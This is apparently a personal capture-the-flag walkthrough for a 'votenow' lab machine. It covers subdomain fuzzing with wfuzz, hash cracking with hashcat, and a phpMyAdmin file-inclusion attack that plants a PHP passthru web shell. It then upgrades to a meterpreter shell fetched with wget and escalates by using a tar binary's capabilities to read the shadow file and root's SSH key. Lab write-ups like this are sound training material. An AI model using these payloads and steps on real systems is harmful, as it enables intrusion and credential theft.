** Just a heads up, I was able to import into VMware Workstation without an issue. **
1. First, doing a nmap scan for the CTF box’s IP Address. Once discovered, doing a nmap scan for available service ports.
2. We have two available ports, 2082 and port 80. Port 2082 was a ssh service and port 80 was an apache service running.
3. We do a dirb scan for port 80 to do directory enumeration.
4. We also need to observe and enumerate the web pages. I did this using Burp. I did not find much honestly for a while. I took note of the domain votenow.local and added to my hosts file. However, I was presented with the same information.
5. This is where I asked for clue from the author of the CTF. He mentioned there may be a hidden sub-domain and a backup file that could help get my a foothold to the box. I never thought of virtual hosts for the box. I went straight to wfuzz:
wfuzz -c -w /opt/DirBuster/directory-list-2.3-small.txt --hl 282 --hc 400,403,404 -H "Host: FUZZ.votenow.local" -t 100 http://votenow.local
This is where I found datasafe as a possible subdomain. Time to add it to the host file.
6. This is where I scanned the hidden subdomain for all kinds of possible backup files. Nothing. Well, interesting anyway.
7. What am I missing? There must be a backup file somewhere. I bet it is something simple too. Arrghhh.
8. Ok, clue number 2. Author suggested maybe try the main domain. Of course, I missed that, and it has CREDS!!
9. I was able to get in. Then, I checked out the Metasploit module to see if it was exploitable: https://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_lfi_rce
10. It did not work. Seems like it should have worked. Oh well, let’s check around.
11. So I see the users table. I see there is a hash for the admin’s user account. That is all I see but hopefully I can use it somehow.
* Used the hash from the users table in the web app.
* hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
12. So we have a username and password. I was not able to use it to login or get different access to the phpMyAdmin app. Then, again I checked the phpMyAdmin version and checked for vulns again:
13. I can exploit the LFI vuln using the database. I was able to view the PHP config with phpinfo(). It took a minute to find the exact directory location for my session, but I eventually found it.
14. Now, let’s see if we can get a web shell in: select "<?php passthru($_GET ['cmd']);exit;?>"
16. It worked. We now know that the process is running as apache instead of root.
17. We should be able to get a better web shell in there. We just need to host a page and get our small web shell to request the better one.
18. With a wget, we were able to request it and rename it. We are able to go to the page and now we have our meterpreter web shell working:
19. I looked around for processes running as root. Also, I looked for anything in the home directories. There was only the admin dir. It had two weird text files, user.txt and notes.txt. Also, noted the version of the OS: Linux votenow.local 3.10.0-1127.13.1.el7.x86_64 #1 SMP.
[admin@votenow ~]$ cat notes.txt
1) Utilise new commands to backup and compress sensitive files
[admin@votenow ~]$ cat user.txt
20. I was stuck here. Uploaded the LinEnum.sh file. Looked for sticky bit files, more weird processes, etc. Found nothing. Clue number 3: Look up Linux ‘capabilities’ and you will find a file that will help.
21. After reading about this, now I got the clues from the text files in the admin folder. Additional reading:
22. So identified the tarS executable that could copy the shadow file and allow us to read it. I tried to crack it but no dice. I even thought I could possibly rewrite it and add my own hash to it. Nope.
23. I remembered about the --checkpoint exploit (wildcard injection). I had it in my notes from the OSCP or a previous CTF but it worth checking out. I tried writing a bash script that could possibly escalate me. Noooooope. Wait, it allowed me to read the shadow file. What about reading root’s ssh files??!!
24. I see the ssh_id file and we have the ssh port. Hopefully, it is not password protected. We are in.
25. I had to thank the author for a great CTF. It was challenging and yet another reminder, keep reading and learning.
Post a Comment